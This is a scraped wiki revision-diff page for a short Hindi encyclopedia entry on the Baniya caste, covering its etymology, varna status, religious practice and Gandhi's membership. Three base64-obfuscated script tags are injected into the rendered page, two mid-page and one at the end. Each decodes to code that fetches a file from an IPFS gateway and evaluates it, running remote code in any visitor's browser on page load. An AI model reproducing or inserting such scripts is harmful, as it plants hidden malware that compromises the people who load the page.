Difference between revisions of "बनिया जाति"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " वाणिज्य " to " वाणिज्य ")
 
Line 1: Line 1:
*([[संस्कृत]] शब्द [[वाणिज्य]] से उत्पन्न), सामान्यत: पैसा उधार देने वालों अथवा व्यापारियों का भारतीय जाति, मुख्यत: उत्तरी और पश्चिमी [[भारत]] में पाई जाती हैं हालाकि संकीर्ण अर्थ में कई व्यापारी समुदाय बनिए नहीं हैं और विलोमत: कुछ बनिए व्यापारी नहीं हैं।  
+
*([[संस्कृत]] शब्द [[वाणिज्य]] से उत्पन्न), सामान्यत: पैसा उधार देने वालों अथवा व्यापारियों का भारतीय [[जाति]], मुख्यत: उत्तरी और पश्चिमी [[भारत]] में पाई जाती हैं हालाकि संकीर्ण अर्थ में कई व्यापारी समुदाय बनिए नहीं हैं और विलोमत: कुछ बनिए व्यापारी नहीं हैं।
 +
 
 
*भारतीय समाज की चतुष्वर्णीय व्यवस्था में असंख्य बनिया उपजातियों, जैसे अग्रवाल को वैश्य वर्ण का सदस्य माना जाता है।  
 
*भारतीय समाज की चतुष्वर्णीय व्यवस्था में असंख्य बनिया उपजातियों, जैसे अग्रवाल को वैश्य वर्ण का सदस्य माना जाता है।  
 
*धार्मिक अर्थों में वे सामान्यत: [[वैष्णव]] या [[जैन]] होते हैं और पूर्णत: शाकाहारी, मद्यत्यागी और आनुष्ठानिक पवित्रता के पालन में रूढ़िवादी होते हैं।  
 
*धार्मिक अर्थों में वे सामान्यत: [[वैष्णव]] या [[जैन]] होते हैं और पूर्णत: शाकाहारी, मद्यत्यागी और आनुष्ठानिक पवित्रता के पालन में रूढ़िवादी होते हैं।  
 
*[[महात्मा गांधी]] गुजराती बनिया जाति के थे।  
 
*[[महात्मा गांधी]] गुजराती बनिया जाति के थे।  
  
{{प्रचार}}
+
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
{{लेख प्रगति
 
|आधार=  
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{जातियाँ और जन जातियाँ}}
 
{{जातियाँ और जन जातियाँ}}
[[Category:जातियाँ और जन जातियाँ]]
+
[[Category:जातियाँ और जन जातियाँ]][[Category:इतिहास कोश]]
[[Category:इतिहास कोश]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 12:53, 11 November 2014

  • (sanskrit shabd vanijy se utpann), samanyat: paisa udhar dene valoan athava vyapariyoan ka bharatiy jati, mukhyat: uttari aur pashchimi bharat mean paee jati haian halaki sankirn arth mean kee vyapari samuday banie nahian haian aur vilomat: kuchh banie vyapari nahian haian.
  • bharatiy samaj ki chatushvarniy vyavastha mean asankhy baniya upajatiyoan, jaise agraval ko vaishy varn ka sadasy mana jata hai.
  • dharmik arthoan mean ve samanyat: vaishnav ya jain hote haian aur poornat: shakahari, madyatyagi aur anushthanik pavitrata ke palan mean roodhivadi hote haian.
  • mahatma gaandhi gujarati baniya jati ke the.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>